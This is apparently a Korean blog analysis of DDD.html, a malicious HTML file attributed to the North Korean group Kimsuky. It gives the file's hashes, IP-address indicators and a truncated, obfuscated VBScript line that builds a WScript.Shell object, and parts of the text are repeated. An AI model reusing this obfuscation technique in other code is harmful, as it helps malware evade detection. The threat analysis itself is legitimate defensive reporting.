북한 김수키(Kimsuky)에서 만든 악성코드-DDD.html(2023.03.27)
Contents
오늘은 북한 해킹 조직 중 하나인 김수키(Kimsuky,キムスキー)는 기본적으로 한국의 싱크탱크,산업계,원자력 발전소 그리고 대북 관계자, 그리고 탈북단체에서 운영하는 주요인물을 대상으로 조직적으로 해킹하고 있으며 한국의 퇴역 장교(특히 대북 기밀 다루었던 분), 전·현직 외교관, 전·현직 정부기관에 일하고 있든 일을 하고 있지 않든 아무튼 대북 관련 단체이며 해킹을 하고 있으며 그리고 최근 영업이 러시아, 미국 및 유럽 국가로 확장하고 있으며
김수키 라는 이름은 이 그룹의 공격을 처음 보고한 러시아의 보안기업 카스퍼스키 가 도난당한 정보를 보내는 이메일 계정 이름이 김숙향(Kimsukyang)이었기 때문이며 Gold Dragon,Babyshark,Appleseed 등 수많은 악성코드를 사용했으며 전직 이름 탈륨(Thallium), 벨벳 천리마(Velvet Chollima), 블랙반시(Black Banshee) 등으로 불리고 있으며 해당 악성코드는 자바스크립트로 작성된 악성코드입니다.
해쉬값은 다음과 같습니다.
파일명:DDD.html
사이즈:24.6 KB
CRC32:7a9f5726
MD5:ec3c0d9cbf4e27e0240c5b5d888687ec
SHA-1:76f3f377aa66f9beaa8a103a4dd67f4fdcbeaa0d
SHA-256:7a45a529b275cfaa6ebde88bf00413a11c0f701bf9e1e7e93ef27423fd17e3f5
SHA-512:af3c54c21b140ff22dff066a3ede1c3693fae3c8740c563643af827c1cd403c3ad0905f86a745b2d5162a2793719e6bf6498f6d51ecb8dd51ec46e4a5673e880
해당 html 파일을 열어 보면 그냥 아무것도 없는 것처럼 보이지만 해당 웹 소스를 열어보면 다음과 같이 VBScrip 돼 있습니다.
일단 해당 코드를 보면 다음과 같습니다.
hidzswxm = CreateObject((c)hcynykm("5(7)") & chcynykm("5(3)") & chcynykm("6(3)") & chcynykm("7(2)") & chcynykm("(6)9") & chcynykm("7(0)") & chcynykm("74") & chcynykm("2(e)") & chcynykm("53") & chcynykm("6(8)") & chcynykm("6(5)") & chcynykm("6c") & chcynykm("6(c)")) tsyyeplx …
김수키 라는 이름은 이 그룹의 공격을 처음 보고한 러시아의 보안기업 카스퍼스키 가 도난당한 정보를 보내는 이메일 계정 이름이 김숙향(Kimsukyang)이었기 때문이며 Gold Dragon,Babyshark,Appleseed 등 수많은 악성코드를 사용했으며 전직 이름 탈륨(Thallium), 벨벳 천리마(Velvet Chollima), 블랙반시(Black Banshee) 등으로 불리고 있으며 해당 악성코드는 자바스크립트로 작성된 악성코드입니다.
해쉬값은 다음과 같습니다.
파일명:DDD.html
사이즈:24.6 KB
CRC32:7a9f5726
MD5:ec3c0d9cbf4e27e0240c5b5d888687ec
SHA-1:76f3f377aa66f9beaa8a103a4dd67f4fdcbeaa0d
SHA-256:7a45a529b275cfaa6ebde88bf00413a11c0f701bf9e1e7e93ef27423fd17e3f5
SHA-512:af3c54c21b140ff22dff066a3ede1c3693fae3c8740c563643af827c1cd403c3ad0905f86a745b2d5162a2793719e6bf6498f6d51ecb8dd51ec46e4a5673e880
해당 html 파일을 열어 보면 그냥 아무것도 없는 것처럼 보이지만 해당 웹 소스를 열어보면 다음과 같이 VBScrip 돼 있습니다.
일단 해당 코드를 보면 다음과 같습니다.
hidzswxm = CreateObject((c)hcynykm("5(7)") & chcynykm("5(3)") & chcynykm("6(3)") & chcynykm("7(2)") & chcynykm("(6)9") & chcynykm("7(0)") & chcynykm("74") & chcynykm("2(e)") & chcynykm("53") & chcynykm("6(8)") & chcynykm("6(5)") & chcynykm("6c") & chcynykm("6(c)")) tsyyeplx …
IoC
145.14.144.162
145.14.145.67
76f3f377aa66f9beaa8a103a4dd67f4fdcbeaa0d
7a45a529b275cfaa6ebde88bf00413a11c0f701bf9e1e7e93ef27423fd17e3f5
af3c54c21b140ff22dff066a3ede1c3693fae3c8740c563643af827c1cd403c3ad0905f86a745b2d5162a2793719e6bf6498f6d51ecb8dd51ec46e4a5673e880
ec3c0d9cbf4e27e0240c5b5d888687ec
145.14.145.67
76f3f377aa66f9beaa8a103a4dd67f4fdcbeaa0d
7a45a529b275cfaa6ebde88bf00413a11c0f701bf9e1e7e93ef27423fd17e3f5
af3c54c21b140ff22dff066a3ede1c3693fae3c8740c563643af827c1cd403c3ad0905f86a745b2d5162a2793719e6bf6498f6d51ecb8dd51ec46e4a5673e880
ec3c0d9cbf4e27e0240c5b5d888687ec